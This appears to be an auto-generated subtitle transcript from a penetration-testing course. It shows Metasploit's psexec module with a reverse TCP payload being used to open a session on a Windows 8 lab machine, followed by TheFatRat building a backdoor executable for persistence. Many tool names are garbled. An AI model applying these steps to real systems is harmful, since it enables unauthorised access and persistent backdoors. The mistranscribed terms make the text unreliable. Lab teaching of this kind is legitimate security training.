1
00:00:00,490 --> 00:00:06,310
‫So let's try another method for persistence, which is not deprecated yet.

2
00:00:07,850 --> 00:00:14,450
‫So if you can recall when we run them interpreters persistence module, it says that the maturity scripts

3
00:00:14,450 --> 00:00:21,860
‫are deprecated and suggests to us to try the post windows manage persistence XY module.

4
00:00:23,310 --> 00:00:30,000
‫And when we look at the options of the Persistence XY module, we see that we need to have two things.

5
00:00:30,000 --> 00:00:32,790
‫First, we need a session to run the session on.

6
00:00:33,190 --> 00:00:37,890
‫Second, we need to have an executable to use as the backdoor binary.

7
00:00:38,490 --> 00:00:44,250
‫And that means it's our responsibility to find or create a backdoor to use with this module.

8
00:00:45,420 --> 00:00:47,340
‫So let's create a session first.

9
00:00:47,670 --> 00:00:52,320
‫This is the vector machine Windows eight with the IP address two two three.

10
00:00:53,480 --> 00:00:57,770
‫Now, I want to be sure that Windows Defender is up and running.

11
00:00:58,610 --> 00:01:03,080
‫So writing defender in the Start menu, here is the Windows Defender.

12
00:01:03,080 --> 00:01:07,820
‫And yup, it's running and the real time protection is on.

13
00:01:08,960 --> 00:01:14,240
‫So go back to Cali, open a terminal window and run massive console.

14
00:01:20,370 --> 00:01:21,570
‫And here I'll use again.

15
00:01:21,830 --> 00:01:27,810
‫P.S. exec module to create an interpreter session on the Windows eight victims system.

16
00:01:28,900 --> 00:01:32,980
‫So use exploit Windows SMB peace exec.

17
00:01:33,870 --> 00:01:38,490
‫Said the payload to Windows interpreter reverse TCP.

18
00:01:39,540 --> 00:01:45,990
‫Now is the time to set the options, Carly, as our host Windows eight as our host.

19
00:01:47,610 --> 00:01:48,660
‫Users admin.

20
00:01:49,700 --> 00:01:53,120
‫The password hash was in the file on the desktop.

21
00:01:59,110 --> 00:02:01,690
‫Now we are ready to run the exploit.

22
00:02:03,080 --> 00:02:07,850
‫Yep, look at that, we have an interpreter session on Windows eight System two to three.

23
00:02:09,440 --> 00:02:12,800
‫So we opened the session and now we need a back door.

24
00:02:14,900 --> 00:02:20,870
‫I'm going to use the fat rat tool to create the malware that sounds like it worked on it.

25
00:02:22,200 --> 00:02:28,920
‫Well, you're right, the fat rat is a powerful and easy to use exploitation tool that can help you

26
00:02:28,920 --> 00:02:34,770
‫to generate back doors and post exploitation attacks like browser attack deal files.

27
00:02:35,460 --> 00:02:41,820
‫This tool compiles malware with popular payloads, and then the compiled malware can be executed on

28
00:02:41,820 --> 00:02:44,550
‫Windows, Linux, Mac, OS X and Android.

29
00:02:46,450 --> 00:02:52,420
‫Now, since it's not the subject of the course, I'm not going to go in too deep with the fat rat.

30
00:02:53,260 --> 00:02:55,870
‫I'll just quickly use it just to give you an idea.

31
00:02:57,580 --> 00:03:01,810
‫To have detailed information about creating undetectable malicious software.

32
00:03:02,470 --> 00:03:02,980
‫Please.

33
00:03:03,010 --> 00:03:07,630
‫I'll refer you to the social engineering and malware for hacking course.

34
00:03:09,600 --> 00:03:14,700
‫So when we run the fat rat, it first checks if dependent applications are ready.

35
00:03:21,720 --> 00:03:26,760
‫Now, a warning about not to upload the created malware to VirusTotal.

36
00:03:28,200 --> 00:03:30,300
‫Then it starts at PostgreSQL.

37
00:03:30,780 --> 00:03:34,140
‫And finally, we're on the main menu of the Fat Rat app.

38
00:03:35,460 --> 00:03:39,450
‫Now, type six, to use the sixth option to create a backdoor.

39
00:03:39,960 --> 00:03:44,160
‫Now we are in the Pond Wins menu, choose the fourth option here.

40
00:03:46,070 --> 00:03:47,720
‫Now, is it time to set the options?

41
00:03:48,320 --> 00:03:52,760
‫Host is actually I'll choose four three two one for the airport.

42
00:03:53,180 --> 00:03:55,010
‫Now that doesn't have a special meaning.

43
00:03:55,010 --> 00:03:58,160
‫You can choose any port which is not in use at the moment.

44
00:03:59,120 --> 00:04:02,000
‫Choose a base name for the file that will be produced.

45
00:04:02,090 --> 00:04:04,640
‫I'll choose my pretty back door.

46
00:04:06,820 --> 00:04:13,080
‫Now it asks for the payload now, and I choose three mature, prettier rivers TCP.

47
00:04:15,220 --> 00:04:18,670
‫I start to generate the back door and a few seconds later.

48
00:04:18,940 --> 00:04:21,610
‫Back door file is saved to the output folder.

49
00:04:23,820 --> 00:04:29,790
‫Well, I'll open another terminal screen to look at the output folder and go to the output folder under

50
00:04:29,790 --> 00:04:32,970
‫the fat rat using the CD command, of course.

51
00:04:34,990 --> 00:04:39,880
‫And there it is, my pretty back door is right here where I wanted it to be.